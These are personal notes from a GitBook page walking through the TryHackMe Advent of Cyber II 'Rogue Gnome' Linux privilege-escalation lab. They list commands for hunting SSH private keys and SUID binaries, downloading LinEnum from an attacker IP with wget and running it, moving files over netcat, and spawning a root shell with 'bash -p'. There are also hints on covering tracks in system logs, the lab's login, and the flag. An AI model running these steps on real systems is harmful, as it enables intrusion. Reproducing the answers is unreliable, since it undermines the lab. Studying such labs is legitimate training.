Try Hack Me
  • Try Hack Me
  • Rooms
  • Tutorial
    • Welcome to TryHackMe
    • Welcome
    • Tutorial
    • Starting Out In Cyber Sec
    • Welcome
  • Capture The Flag
    • Advent of Cyber
      • Task 1 - 10
      • Task 11 - 20
      • Task 21 - 29
      • PDF - materials
    • Anonymous
    • Mnemonic
    • Bounty Hacker
    • Ignite
    • Pickle Rick
    • Simple CTF
    • Agent Sudo
    • Mr. Robot
  • Advent of Cyber II
    • A Christmas Crisis
    • The Elf Strikes Back!
    • Christmas Chaos
    • Santa's watching
    • Someone stole Santa's gift list!
    • Be careful with what you wish on a Christmas night
    • The Grinch Really Did Steal Christmas
    • What's Under the Christmas Tree?
    • Anyone can be Santa!
    • Don't be sElfish!
    • The Rogue Gnome
    • Ready, set, elf.
    • Coal for Christmas
    • Where's Rudolph?
    • There's a Python in my stocking!
    • Help! Where is Santa?
    • ReverseELFneering
    • The Bits of Christmas
    • The Naughty or Nice List
    • PowershELlF to the rescue
    • Time for some ELForensics
    • Elf McEager becomes CyberElf
    • The Grinch strikes again!
    • The Trial Before Christmas
    • Thank You
  • Linux
    • Linux Fundamentals Part 1
    • Linux Fundamentals Part 2
    • Linux Fundamentals Part 3
    • LinuxCTF - Linux Challenges
    • Learn Linux - wip
    • Find - wip
  • Windows
    • Intro to Windows
  • OSINT
    • Introductory Researching - wip
    • Google Dorking
    • OhSINT
    • Sublist3r
    • Searchlight - IMINT
    • Geolocating Images
  • Crypto
    • Hashing - Crypto 101
    • Encryption - Crypto 101
    • CrackTheHash - wip
  • Network
    • Introductory Networking
    • Nmap
    • Network Services - wip
    • Network Services 2 - wip
    • Networking - wip
    • Nmap - wip
    • TOR
  • Web
    • Web Fundamentals
  • Pentest
    • Pentest questionaire
  • Hardware
    • Dumping Router Firmware
  • HELP
  • Reverse
    • Reversing ELF
Powered by GitBook
On this page
  • Video
  • Resources
  • The "Priv Esc Checklist"
  • Cheatsheets
  • SUID 101
  • Enumeration Scripts
  • Transfer Scripts
  • Covering our Tracks
  • Challenge
  • What type of privilege escalation involves using a user account to execute commands as an administrator?
  • What is the name of the file that contains a list of users who are a part of the sudo group?
  • Use SSH to log in to the vulnerable machine like so: ssh cmnatic@10.10.6.64
  • Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
  • What are the contents of the file located at /root/flag.txt?

Was this helpful?

  1. Advent of Cyber II

The Rogue Gnome

Networking - Priv Esc

PreviousDon't be sElfish!NextReady, set, elf.

Last updated 4 years ago

Was this helpful?

Video

Resources

whoami name of the account

echo $0 our shell

python -c 'import pty; pty.spawn("/bin/bash")' spawn another shell and make it interactive

We're using find to search the volume, by specifying the root (/) to search for files named "id_rsa" which is the name for private SSH keys, and then using 2> /dev/null to only show matches to us.

find / -name id_rsa 2> /dev/null

The "Priv Esc Checklist"

  1. Determining the kernel of the machine (kernel exploitation such as Dirtyc0w)

  2. Locating other services running or applications installed that may be abusable (SUID & out of date software)

  3. Looking for automated scripts like backup scripts (exploiting crontabs)

  4. Credentials (user accounts, application config files..)

  5. Mis-configured file and directory permissions

Cheatsheets

SUID 101

find / -perm -u=s -type f 2>/dev/null

Enumeration Scripts

Transfer Scripts

python3 -m http.server 8080

nc -l -p 1337 > LinEnum.sh nc -w -3 10.10.6.64 1337 < LinEnum.sh

Covering our Tracks

  • "/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)

  • "/var/log/syslog" (System events such as firewall alerts:)

  • "/var/log/<service/" -- /var/log/apache2/access.log"

Challenge

What type of privilege escalation involves using a user account to execute commands as an administrator?

vertical

What is the name of the file that contains a list of users who are a part of the sudo group?

sudoers

Use SSH to log in to the vulnerable machine like so: ssh cmnatic@10.10.6.64

Input the following password when prompted: aoc2020

No answer needed

You may find uploading some of the enumeration scripts that were used during today's task to be useful.

wget 10.14.4.204:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

https://gtfobins.github.io/gtfobins/bash/

bash -p

No answer needed

Use this executable to launch a system shell as root.

What are the contents of the file located at /root/flag.txt?

cat /root/flag.txt

thm{2fb10afe933296592}

Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of and your researching skills to learn how to exploit this binary.

DVWA (Damn Vulnerable Web App)
g0tmi1k
payatu
PayloadAllTheThings
GTFOBins
LinEnum
GTFObins